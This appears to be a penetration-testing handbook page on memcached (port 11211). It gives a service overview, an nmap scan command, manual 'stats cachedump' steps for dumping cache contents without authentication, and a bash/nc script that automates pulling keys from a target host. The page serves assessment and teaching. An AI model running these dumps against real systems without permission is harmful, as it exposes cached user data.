11211 - memcached

Overview

Memcached is a distributed in-memory key-value store caching system. It is often used to speed up dynamic database-driven websites by caching data and objects in RAM to reduce the number of times an external data source (such as a database or API) must be read.

Memcached is a free and open-source software written in C, that runs on Unix-like operating systems (at least Linux and OS X) and on Microsoft Windows.

Memcached's APIs provide a very large hash table distributed across multiple machines. When the table is full, subsequent inserts cause older data to be purged in least recently used (LRU) order. Expired items are removed first then the least used items are overwritten so that the frequently requested information can be retained in memory.

Memcached is widely used for large scale web application, including major players like YouTube, Reddit, Facebook, Twitter, and Wikipedia.

Memcached supports the only following data structure, called an "item" which consists of:

A key (arbitrary string up to 250 bytes in length. No space or newlines for ASCII mode)
A 32bit "flag" value
An expiration time, in seconds. '0' means never expire. Can be up to 30 days.
A 64bit "CAS" value, which is kept unique.
Arbitrary item data

Supported commands

Memcached handles a small number of basic commands:

Command

Description

Example

Network scan

nmap can be used to scan the network for memcached services:

# memcached supports both TCP and UDP
nmap -sS -sU -v -p 11211 -sV -sC -oA nmap_memcached <RANGE | CIDR>

Unrestricted keys dumping

As most deployments of memcached are within trusted networks, no authentication mechanism is implemented by default. Thus clients may connect freely to the memcached instance to retrieve the content cached, which may contain sensible information.

The dumping of the keys and their associated data relies on the undocumented command stats cachedump, which is needed to retrieve the keys. The command could be removed at anytime.

The process to dump the memcached keys and values is as follow:

# Retrieve slabs identifier
stats items
-> STAT items:<SLAB_ID>:...

# Retrieve the keys within the slab specified. Maximum number of keys: 1000
stats cachedump <SLAB_ID> <NUMBER_OF_KEYS>
-> ITEM <KEY> [24625 b; 1549536086 s] ...

# Retrieve the data associated to the key specified
get <KEY>
-> VALUE <KEY> 0 24625 <DATA>

The following bash script, courtesy of Omar Al-Ithawi, can be used to automate the process above. Note that the script is not adapted for larger memcached instance.

#!/usr/bin/env bash

echo 'stats items'  \
| nc <HOST> 11211  \
| grep -oe ':[0-9]*:'  \
| grep -oe '[0-9]*'  \
| sort  \
| uniq  \
| xargs -L1 -I{} bash -c 'echo "stats cachedump {} 1000" | nc <HOST> 11211'

References

https://lzone.de/cheat-sheet/memcached https://stackoverflow.com/questions/19560150/get-all-keys-set-in-memcached

Previous9100 - Printers Next27017 / 27018 - MongoDB

Last updated 2 years ago

Command

Description

Example

# Retrieve slabs identifier stats items -> STAT items:<SLAB_ID>:... # Retrieve the keys within the slab specified. Maximum number of keys: 1000 stats cachedump <SLAB_ID> <NUMBER_OF_KEYS> -> ITEM <KEY> [24625 b; 1549536086 s] ... # Retrieve the data associated to the key specified get <KEY> -> VALUE <KEY> 0 24625 <DATA>

#!/usr/bin/env bash echo 'stats items' \ | nc <HOST> 11211 \ | grep -oe ':[0-9]*:' \ | grep -oe '[0-9]*' \ | sort \ | uniq \ | xargs -L1 -I{} bash -c 'echo "stats cachedump {} 1000" | nc <HOST> 11211'